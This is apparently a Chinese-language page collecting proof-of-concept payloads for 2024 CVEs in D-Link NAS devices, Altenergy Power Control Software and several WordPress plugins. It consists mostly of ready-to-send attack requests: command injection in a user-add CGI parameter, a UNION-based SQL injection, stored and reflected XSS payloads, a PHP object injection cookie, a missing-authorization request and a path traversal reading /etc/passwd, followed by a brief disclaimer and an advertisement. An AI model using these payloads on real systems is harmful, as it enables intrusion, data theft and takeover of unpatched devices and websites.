Bootstrap

2024年wordpress、d-link等相关的多个cve漏洞poc

⚠️ 漏洞

✅ CVE-2024-10914

在D-Link DNS-320、DNS-320LW、DNS-325和DNS-340L中发现的漏洞,版本直到20241028

GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;id;%27 HTTP/1.1

✅ CVE-2024-11305

在Altenergy Power Control Software中发现的关键漏洞,版本直到20241108

POST /index.php/display/status_zigbee HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Connection: close

date=2024-11-06%' UNION ALL SELECT 11,CHAR(113)CHAR(75,101,86,69,115,83,113,89,100,122,121,102,83,83,113,86,84,112,100,103,69,75,80,117,88,109,83,105,89,116,110,120,76,84,73,109,115,100,83,107)CHAR(113,118,98,98,113),11-- wPIB

✅ CVE-2024-10793

WP Security Audit Log插件检测 一个允许注入恶意脚本的XSS漏洞。.

curl -X POST 'http://example.com/wp-admin/admin-ajax.php' \
     -d 'action=destroy-sessions&user_id=<script>alert("XSS found windz3r0day")</script>'

✅ CVE-2024-11199

通过插件的rescue_progressbar短代码进行的存储跨站脚本攻击

[rescue_progressbar visibility='foo" onclick="alert(/XSS/)"']

✅ CVE-2024-11381

通过插件的ch_registro短代码进行的存储跨站脚本攻击

[ch_registro note='"onmouseover="alert(/XSS/)"']

✅ CVE-2024-43919

**YARPP <= 5.30.10 - 缺少授权

该漏洞允许未经授权访问以修改展示类型。.

GET /wp-content/plugins/yet-another-related-posts-plugin/includes/yarpp_pro_set_display_types.php?ypsdt=false&types[]=post&types[]=page HTTP/1.1
Host: example.com

✅ CVE-2024-52433

My Geo Posts Free <= 1.2 - 未经认证的PHP对象注入

GET / HTTP/2
Host: wp-dev.ddev.site
Cookie: mgpf_geo_coockie=TzoyMDoiUEhQX09iamVjdF9JbmplY3Rpb24iOjA6e30=

✅ CVE-2024-9935

Elementor页面构建器的PDF生成插件 <= 1.7.5 - 未经认证的任意文件下载

GET /elementor-84/?rtw_generate_pdf=true&rtw_pdf_file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1
Host: kubernetes.docker.internal
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Priority: u=0, i

▶▶▶ 免责声明

仅用于教育目的。在未获得明确许可的情况下对系统或网站使用这些漏洞是非法的。作者对任何使用这些信息所产生的后果不负责任。

 广告

全网最强大的网络安全资源大全:棉花糖会员站介绍(24年10月4日版本)

;